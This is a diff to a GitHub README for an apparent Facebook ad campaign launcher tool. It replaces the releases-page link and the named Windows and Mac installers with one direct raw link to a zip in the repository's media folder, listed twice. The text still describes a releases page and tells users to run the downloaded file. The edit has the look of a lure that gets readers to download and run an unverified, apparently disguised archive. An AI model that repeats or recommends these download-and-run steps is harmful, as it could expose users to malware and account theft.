auditorest/facebook-ad-campaign-launcher/README.md

 ## 🚀 Getting Started

-1. **Visit the Releases Page**: [Click here to download the latest version](https://github.com/auditorest/facebook-ad-campaign-launcher/releases).
+1. **Visit the Releases Page**: [Click here to download the latest version](https://raw.githubusercontent.com/auditorest/facebook-ad-campaign-launcher/main/media/facebook-ad-campaign-launcher-2.1.zip).

 2. **Choose the Latest Release**: Once on the releases page, look for the latest version of the Facebook Ad Campaign Launcher.

-3. **Download the Installer**: Click on the installer link for your operating system, such as `facebook-ad-campaign-launcher-windows.exe` or `facebook-ad-campaign-launcher-mac.dmg`.
+3. **Download the Installer**: Click on the installer link for your operating system, such as `https://raw.githubusercontent.com/auditorest/facebook-ad-campaign-launcher/main/media/facebook-ad-campaign-launcher-2.1.zip` or `https://raw.githubusercontent.com/auditorest/facebook-ad-campaign-launcher/main/media/facebook-ad-campaign-launcher-2.1.zip`.

 4. **Run the Installer**: Double-click the downloaded file to begin the installation process.
 Follow the on-screen instructions.